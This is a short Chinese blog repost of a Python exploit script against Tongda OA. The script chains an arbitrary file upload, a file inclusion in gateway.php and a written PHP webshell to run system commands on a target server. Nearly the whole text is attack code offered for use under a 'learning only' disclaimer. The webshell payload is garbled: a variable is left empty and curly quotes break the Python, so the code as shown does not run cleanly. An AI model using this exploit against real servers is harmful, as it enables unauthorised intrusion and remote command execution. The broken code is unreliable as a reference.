通达OA任意文件上传、文件包含、RCE——EXP
2021-04-03 14:27
标签:pos decrypt 自带 fopen com 自动生成 返回结果 http print 声明:工具仅供自我学习使用!切勿用于其他非法用途!用于非法用途与本人无关!!! 通达OA任意文件上传、文件包含、RCE——EXP 标签:pos decrypt 自带 fopen com 自动生成 返回结果 http print 原文地址:https://www.cnblogs.com/Yang34/p/12539158.html
import os
import requests
# 定义webshell,因为是包含,所以用写入马比较方便
# 这个马自带bypass disable_function 功能
shell = ‘‘‘$fp = fopen(‘readm.php‘, ‘w+‘);
$a = ;
fwrite($fp, urldecode($a));
fclose($fp);
?>
‘‘‘
# 输入目标
url = input("input the TARGET(example:[url]https://127.0.0.1:1080[/url])>")
# 定义上传目录和包含目录
upload_url = url+"/ispirit/im/upload.php"
include_url = url+"/ispirit/interface/gateway.php"
# 定义shell目录,如果要修改名字,需要把shell里面的一起改了
shell_url = url+"/ispirit/interface/readm.php"
files = {‘ATTACHMENT‘: shell}
# 参见源码,有漏洞的版本只要POST P和DEST_UID参数就会自动生成session
upload_data = {"P": "123", "DEST_UID": "1", "UPLOAD_MODE": "2"}
# 上传
upload_res = requests.post(upload_url, upload_data, files=files)
# 此时会返回上传文件的路径
path = upload_res.text
# 解析返回值获取上传地址
path = path[path.find(‘@‘)+1:path.rfind(‘|‘)
].replace("_", "\/").replace("|", ".")
# 由于上传文件会自动改为jpg,所以要用gateway.php包含
include_data = {"json": "{\"url\":\"/general/../../attach/im/" + path+"\"}"}
# 包含+自动写入shell
include_res = requests.post(include_url, data=include_data)
# 返回结果 a参数可以直接填入系统命令(比如whoami),默认是system权限
print(‘shell is here:‘+shell_url+‘?a=command‘)
下一篇:js、jq 节点、元素获取